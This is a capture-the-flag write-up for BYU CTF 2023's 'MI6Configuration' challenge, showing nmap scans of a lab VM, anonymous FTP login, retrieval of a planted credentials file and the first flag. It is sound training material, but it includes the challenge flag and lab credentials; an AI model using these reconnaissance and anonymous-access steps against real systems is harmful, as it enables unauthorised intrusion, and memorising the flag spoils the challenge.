Tags: mj0ln1r invaders0x1 pentest 

Rating:

# MI6Configuration

Description :

```text
We recently acquired a computer at MI6 and it seems like they might have made some mistakes. Can you hack it using their misconfigurations and get all their important data? (Download the VM file and power it on. Find the IP address and start hacking!)

*Note - there are 3 flags, flag2 does not exist*

https://byu.app.box.com/s/kqlgq3h7t43jqm7k0q124a1eivkonqln
```

Lets do some pentesting here..

Imported the MI6.ova file in virtualbox and installed it successfully, then booted it up. The boot screen password was The first name of James Bond character Q. So, the password was `major` to complete the boot only this was not the actual login password for the machine.

The MI6 machine looks like this after booting.

![img](https://themj0ln1r.github.io/assets/img/post_img/byu23_mi6.png/)

+ Did a quick nmap scan from my parrot machine on mi6 machine.

```sh
┌─[attacker@parrot]─[~]
└──╼ $nmap -Pn -sV 192.168.0.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-24 18:31 IST
Nmap scan report for 192.168.0.133
Host is up (0.00098s latency).
Not shown: 729 filtered tcp ports (no-response), 269 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.28 seconds
```

Tried with default NSE script on the target.

```sh
┌─[attacker@parrot]─[~]
└──╼ $nmap -Pn -sC 192.168.0.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-24 18:33 IST
Nmap scan report for 192.168.0.133
Host is up (0.00057s latency).
Not shown: 729 filtered tcp ports (no-response), 269 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 33 0 22 Apr 17 22:01 flag1.txt
|_-r--r--r-- 1 1002 0 29 Apr 17 15:40 not_my_passwords.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.0.110
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh
| ssh-hostkey:
| 2048 c5849242153793582b2cc8f5d9eed24c (RSA)
| 256 bedc4b8fcfd3c50281bab7791f2b9afa (ECDSA)
|_ 256 7b1fecd2c294bf1b1984f322005cde02 (ED25519)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
```

Cool, there was an `anonymous` login available to the ftp service and two files were available to read.

```sh
┌─[attacket@parrot]─[~]
└──╼ $ftp 192.168.0.133
Connected to 192.168.0.133.
220 (vsFTPd 3.0.3)
Name (192.168.0.133:attacker): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--r--r-- 1 33 0 22 Apr 17 22:01 flag1.txt
-r--r--r-- 1 1002 0 29 Apr 17 15:40 not_my_passwords.txt
226 Directory send OK.
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag1.txt (22 bytes).
226 Transfer complete.
22 bytes received in 0.06 secs (0.3379 kB/s)
ftp> get not_my_passwords.txt
local: not_my_passwords.txt remote: not_my_passwords.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for not_my_passwords.txt (29 bytes).
226 Transfer complete.
29 bytes received in 0.02 secs (1.2592 kB/s)
ftp>
221 Goodbye.
┌─[attacker@parrot]─[~]
└──╼ $cat flag1.txt
byuctf{anonymous_ftp}
┌─[attacker@parrot]─[~]
└──╼ $cat not_my_passwords.txt
james_bond:imthebestAgent007
```

> `Flag 1 : byuctf{anonymous_ftp}`

# [Original Writeup](https://themj0ln1r.github.io/posts/byuctf23)

Original writeup (https://themj0ln1r.github.io/posts/byuctf23).